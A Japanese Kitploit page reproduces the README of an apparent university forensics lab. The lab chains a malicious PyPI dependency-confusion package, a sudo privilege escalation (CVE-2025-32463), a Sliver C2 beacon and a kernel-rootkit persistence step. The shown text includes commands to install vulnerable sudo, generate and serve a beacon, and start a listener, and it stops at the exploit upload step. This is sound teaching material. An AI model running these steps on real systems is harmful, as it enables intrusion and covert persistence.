Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
linux-root-kit — Pythonの依存関係混乱(Dependency Confusion)攻撃、sudo権限昇格(CVE-2025-32463)、ルートキットベースの永続化のエンドツーエンドシミュレーション - 完全なメモリおよびネットワークフォレンジック分析を伴う。 | Kitploit
ツール/GitHubGitHub/ic3-512/linux-root-kit
特権昇格エクスプロイトフレームワークメモリフォレンジック永続化メカニズムネットワークフォレンジックリバースエンジニアリングデジタルフォレンジックコマンド&コントロールサプライチェーンセキュリティ学習と教育ラボと実践
101241年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
ic3-512/linux-root-kit

linux-root-kit

Pythonの依存関係混乱(Dependency Confusion)攻撃、sudo権限昇格(CVE-2025-32463)、ルートキットベースの永続化のエンドツーエンドシミュレーション - 完全なメモリおよびネットワークフォレンジック分析を伴う。

リポジトリを見る

このプロジェクトについて

このプロジェクトは、Technische Hochschule DeggendorfのDigitale Forensikコースの一環として開発されました。

これは、以下を含む完全なフォレンジック調査と攻撃シミュレーションを示しています:

  • 悪意のあるPyPIパッケージを使用したPython依存関係の混乱(dependency confusion)攻撃

  • 脆弱なバージョンのsudoを介した権限昇格(CVE-2025-32463)

  • Sliver C2ビーコンの展開

  • カーネルモジュールのロード、システムコールフック、udevベースの永続化を備えたカスタムルートキット

  • Volatility、NetworkMiner、手動リバースエンジニアリングなどのツールを使用したメモリとネットワークアーティファクトの完全な分析

このリポジトリには、攻撃とフォレンジック調査の両方を再現するためのスクリプト、セットアップ手順、アーティファクト、および詳細な分析手順が含まれています。

目次

  • 権限昇格
  • エクスプロイトチェーン
  • アーティファクトの生成
    • メモリダンプの作成
    • Ubuntuでのネットワークダンプの準備
  • 開発者用Ubuntuクライアント(shell)のセットアップ
    • 1. リポジトリをクローンして実行
    • 2. VMが起動したらSSHで接続
    • 3. 脆弱なsudoとPython venvをインストール
    • 4. ユーザーランドローダーバイナリ(shell)をビルド
    • 5. shellをKaliに送信し、後でそこから配信する。
  • Kaliのセットアップ(192.168.56.101)
    • 1. Sliverサーバーを起動
    • 2. HTTPビーコンを生成
    • 3. ビーコンをリネームして配信
    • 4. リスナーを起動
  • 開発者のシミュレーション
    • 1. PoCをクローン
    • 2. Python venvを作成してアクティベート
    • 3. 依存関係をインストール
    • 4. 悪意のあるパッケージを実行
  • 攻撃者のシミュレーション
    • 1. ビーコンを待機し、sudoのバージョンを確認
    • 2. エクスプロイトとローダーをアップロード
    • 3. Sudoエクスプロイトを実行
    • 4. カーネルモジュールをロード
    • 5. udevルールの設定
    • 6. 再起動
    • 7. 再起動時にシェルを取得
  • 分析
    • 収集されたアーティファクトの概要
    • NetworkMinerによるネットワークの概要
    • 詳細なトラフィック分析
      • GitHubダウンロード
      • PyPIダウンロード
      • 悪意のある“lilux”バイナリの取得
    • ダウンロード後の動作
      • Sliverビーコン通信
      • 暗号化されていないリバースシェル
    • まとめ
      • 主要な発見
      • フォレンジック上の影響
  • メモリ分析
    • 環境とセットアップ
    • メモリダンプの取得
    • デバッグシンボルのインストール
    • Volatilityシンボルファイルの生成
    • シンボルを使用してVolatilityを実行
    • (任意)fzfによる高速検索
    • 注目すべきファイルの発見
    • ロードされたモジュール
    • udevルール
    • shellの抽出
  • shell binaryのリバースエンジニアリング
    • load_module分岐
    • rsh分岐
      • daemonize関数
      • リバースシェル
    • 動作のまとめ
      • 動作サマリー
  • カーネルモジュールのリバースエンジニアリング
    • カーネルモジュールを抽出するPythonスクリプト
      • 1. 範囲を作成
      • 2. 対象アドレスを比較
      • 3. 一致が見つかるまで続行
    • rkit_init
    • フックされた関数
      • Killフック
      • Getdents(64)フック
    • モジュールの隠蔽
    • デバッグメッセージ
    • リバースシェルローダー
    • rkit_exit
  • チェックサム
  • 使用したツールとバージョン

権限昇格

CVE-2025-32463
NVD詳細
PoC GitHub

[!NOTE]
脆弱なSudoバージョン(chrootサポート付き)をインストールする必要があります。詳細はprivesc/setup.shを参照してください。

エクスプロイトチェーン```mermaid

sequenceDiagram autonumber participant Attacker participant PyPI participant IntDep as Internal Dep Server participant Dev as Developer participant C2 as C2 Server

Attacker->>PyPI: Publish package with version v1.0.3
Dev->>IntDep: pip install
IntDep-->>Dev: Returns v1.0.1
Dev->>PyPI: Fallback pip install package==v1.0.3
PyPI-->>Dev: Returns malicious v1.0.3 (stager)
Dev->>Dev: Executes stager (package_evil)
Dev->>C2: Beacon/Sliver implant calls home
Note right of C2: Attacker now has RCE

Attacker->>Dev: Enumerates sudo version (1.9.16p2)
Attacker->>Dev: Runs CVE-2025-32463 exploit
Note right of Dev: PE to root

Dev->>Dev: Downloads & runs rootkit loader binary
Dev->>Dev: Loader installs kernel module & configures udev rule
Dev->>Dev: Schedules reboot
Note right of Dev: Attacker established persistence 

Dev->>Dev: System reboots
Dev->>Dev: Udev loads kernel module on boot
Dev->>C2: Kernel-stage beacon calls C2
# アーティファクト生成

すべてのアーティファクトは手動で生成されます。2台のマシンを使用します:
- **攻撃者マシン** (Kali Linux)
- **開発者マシン** (Ubuntu)

次の3つのアーティファクトを生成します:
- **PCAP** (再起動前)
- **メモリダンプ** (再起動後)

## メモリダンプの作成
[VirtualBoxメモリのダンプ方法](https://www.ired.team/miscellaneous-reversing-forensics/dump-virtual-box-memory)


ホストシステム上で:```shell
vboxmanage list vms
"linux-root-kit_default_1752261916398_20346" {c2d4b5bc-d87f-4dcb-af01-85b78c163fef}
virtualboxvm --startvm "linux-root-kit_default_1752261916398_20346" --dbg

インターフェース --> Debug に移動 デバッグコンソール(VMMR0> プロンプト)で:```shell .pgmphystofile 'dumpmem_linux_root_kit'

## Ubuntu でのネットワークダンプの準備
開発者をシミュレーションする前に開始してください。 `! port 22` は vagrant ssh 接続をログに記録しないようにするのに便利です。```shell
sudo tcpdump -w output.pcap ! port 22

開発者向けUbuntuクライアントのセットアップ (shell)

1. リポジトリをクローンして実行: ```shell

vagrant up

これには時間がかかる場合があります --> Bento でビルドされた VM 全体をダウンロードします。 

## 2. VM が起動したら、SSH でログイン:  ```shell
vagrant ssh

3. 脆弱なsudoとPython venvをインストールします: ```shell

sudo bash /vagrant/privesc/setup.sh sudo apt install python3.12-venv

## 4. ユーザーランドローダーバイナリ(shell)をビルドします:

`make` ファイルを実行して、ユーザーランドバイナリ `shell` をビルドすることもできます。これが最も簡単な方法です。そうしない場合は、まず正しいヘッダーをインストールする必要があります :P。

## 5. `shell` をKaliに送信して、後でそこから配信します。


# Kali のセットアップ (192.168.56.101)

## 1. Sliver サーバーを起動  ```shell
sliver

Sliver 起動

2. HTTP ビーコンを生成する ```shell

generate beacon --os linux --format elf --arch amd64 --http 192.168.56.101

![Sliver ビーコンを作成](https://assets.kitploit.com/production/public/readmes/36699/d213950ede6c17da9bce720e79cf2e358748730fab1bde555a184d92341cc61f.png)


## 3. ビーコンの名前を変更して配信する  ```shell
mv INTERNATIONAL_DETENTION lilux
python3 -m http.server 9001

4. リスナーを開始 ```

http -l 80 -L 0.0.0.0

# 開発者をシミュレート

## 1. PoC をクローンする

このリポジトリは、dependency-confusion に対して脆弱な設定を持つ任意のリポジトリで構いません :D。  ```
git clone https://github.com/IC3-512/dependency-confusion-attack.git

2. Python venv の作成とアクティベート ```

python3 -m venv .venv source .venv/bin/activate

## 3. 依存関係のインストール  ```
pip install --upgrade --force-reinstall --no-cache-dir -r requirements.txt --verbose 

4. 悪意のあるパッケージを実行する ```

python3 app.py

これで、私たちのビーコンをロードして実行する悪意のあるパッケージが起動するはずです。



# 攻撃者をシミュレートする

_(悪い opsec xD)_

## 1. ビーコンを待機し、sudo のバージョンを確認する:

![対話型セッションを取得](https://assets.kitploit.com/production/public/readmes/36699/4730232dbc2909aca3efb51f79f877dd4aa059782fdd4c9f00b7d54cfc642fe8.png)

![シェルを取得](https://assets.kitploit.com/production/public/readmes/36699/d00bd910f805c33e594d42e0334594fabada9452eed44698891fbc27bf64de9f.png)  ```
sudo -V

2. エクスプロイトとローダーのアップロード

ツールをダウンロード